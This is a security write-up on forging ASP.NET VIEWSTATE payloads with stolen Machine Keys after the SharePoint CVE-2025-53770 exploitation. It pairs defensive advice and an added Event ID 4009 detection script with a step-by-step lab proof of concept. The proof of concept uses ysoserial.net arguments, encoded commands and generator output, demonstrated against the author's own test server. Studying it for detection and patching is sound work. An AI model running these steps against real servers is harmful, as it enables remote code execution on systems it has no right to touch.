# ViewState - CVE-2025-53770

## .NET ViewState

About 10 days after SharePoint deserialization bugs (CVE-2025-53770/53771) were abused, attackers began dropping ASPX shells that leak IIS/ASP.NET Machine Keys used to protect VIEWSTATE and cookies. If an attacker obtains a Machine Key — from `web.config` or the registry via uploaded ASPX — they can forge valid VIEWSTATE payloads (e.g., via ysoserial.net) to achieve <mark style="color:red;">Remote Code Execution</mark> across the app. Windows won’t rotate autogenerated Machine Keys automatically, so you must regenerate the Machine Key after any code execution. Defenders should also monitor Windows Application Event ID 4009 (VIEWSTATE verification failures) to detect exploitation attempts.

Requirements:

* VIEWSTATE deserialization (LosFormatter enabled)
* MachineKey (validation key and optional decryption key)
* Validation algorithm (e.g., HMACSHA256 / SHA1)
* Application path / appDomain (used when crafting VIEWSTATE)
* Delivery capability (send malicious VIEWSTATE to the app — e.g., HTTP POST; or obtain MachineKey via LFI/XXE or by uploading an ASPX to read the registry)
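
One way to run the Event ID 4009 check mentioned above, as an added example that is not part of the original page. The lookback window, the threshold, and the message fields it parses (`Event code:`, `User host address:`, `Request path:`) are assumptions about the log text, not values from the page.

```powershell
# Added example: hunt the Application log for VIEWSTATE verification failures.
# Assumptions (not from the page): 7-day lookback, threshold of 1, and event
# text that carries "Event code:", "User host address:" and "Request path:".
param(
    [int]$Days = 7,
    [int]$Threshold = 1
)

$since = (Get-Date).AddDays(-$Days)

# Match on Event ID 4009, and also on the failure text in case the code is
# only present in the message body (assumption about the log format).
$hits = Get-WinEvent -FilterHashtable @{ LogName = 'Application'; StartTime = $since } -ErrorAction SilentlyContinue |
    Where-Object {
        $_.Id -eq 4009 -or
        $_.Message -match 'Event code:\s*4009' -or
        $_.Message -match 'Viewstate verification failed'
    }

# Reduce each event to the fields needed for triage.
$rows = foreach ($e in $hits) {
    $client = if ($e.Message -match 'User host address:\s*(\S+)') { $Matches[1] } else { 'unknown' }
    $path   = if ($e.Message -match 'Request path:\s*(\S+)')      { $Matches[1] } else { 'unknown' }
    [pscustomobject]@{ Time = $e.TimeCreated; Client = $client; Path = $path }
}

# One line per client and page, with the time span of the failures.
$rows | Group-Object Client, Path |
    Where-Object { $_.Count -ge $Threshold } |
    Sort-Object Count -Descending |
    ForEach-Object {
        $sorted = @($_.Group | Sort-Object Time)
        [pscustomobject]@{
            Client   = $sorted[0].Client
            Path     = $sorted[0].Path
            Failures = $_.Count
            First    = $sorted[0].Time
            Last     = $sorted[-1].Time
        }
    } | Format-Table -AutoSize
```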

### POC || GTFO

#### **Preface**

As there are quite a few requirements needed, I've created and uploaded the file `findMachineKey.aspx` to the target ASP.NET webserver. The ASPX file will read Machine Keys from the registry as well as from the `web.config` file, and is used to simulate LFI and/or RCE to achieve the same thing.

> NOTE: Since release, findMachineKey.aspx is being flagged as an exploit and removed by Windows Threat Protection.

<figure><img src="/files/H8kTFw9INDTczDZrjDcl" alt=""><figcaption></figcaption></figure>

To deliver our soon-to-be-made malicious VIEWSTATE payload, we need a page that accepts POSTs, so I made this simple web form echoing your name.

<figure><img src="/files/h7PqbgCzmk5U6YZBqZR8" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/yjxh01mD9Re0N5fC49A8" alt=""><figcaption></figcaption></figure>

All files used can be found on GitHub.

#### **Exploit**

Download [ysoserial.net](https://github.com/irsdl/ysonet/releases/download/ysonet%2Fv1.11/ysonet-v1.11.zip) and create your Base64-encoded payload.

```powershell
PS C:\> [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami > C:\Windows\Temp\a.txt'))
dwBo[truncated]HQA
```

Generate your malicious VIEWSTATE payload using ysoserial.net.

```powershell

$ysoArgs = @(
  '-p','ViewState',
  '-g','TextFormattingRunProperties',
  '-c','"powershell -e dwBo[truncated]HQA"',
  '--path','/default.aspx',
  '--apppath','/',
  '--validationalg','HMACSHA256',
  '--validationkey','B298[truncated]173D',
  '--islegacy',
  '--isdebug'
)

PS C:\Users\void\Downloads\ysonet-v1.11> .\ysonet.exe @ysoArgs
Validation Algorithm: HMACSHA256
Validation Key: B298[truncated]173D
simulateTemplateSourceDirectory returns: /
simulateGetTypeName returns: default_aspx
SortKey.KeyData for TemplateSourceDirectory: 7, 53, 1, 1, 1, 1, 0
SortKey.KeyData for GetTypeName: 14, 26, 14, 33, 14, 35, 14, 2, 14, 159, 14, 72, 14, 153, 7, 68, 14, 2, 14, 145, 14, 126, 14, 166, 1, 1, 1, 1, 0
Calculated pageHashCode in int: -905247948
Calculated pageHashCode in uint: 3389719348
Calculated __VIEWSTATEGENERATOR: CA0B0334
%2FwEy6[truncated]WoRI%3D
```

Send a POST request with the malicious VIEWSTATE payload to the victim, and we SHOULD get a `500 Internal Server Error` response. This is good: it means that the exploit was successful.

<figure><img src="/files/JzN2PXmxVtfJI1D7YBbB" alt=""><figcaption></figcaption></figure>

Verify on the server side that the file `C:\Windows\Temp\a.txt` exists, meaning we got RCE.

<figure><img src="/files/kzuz47Vp6fmLTtQ5hrLN" alt=""><figcaption></figcaption></figure>

***

## References

* <https://isc.sans.edu/diary/32174>


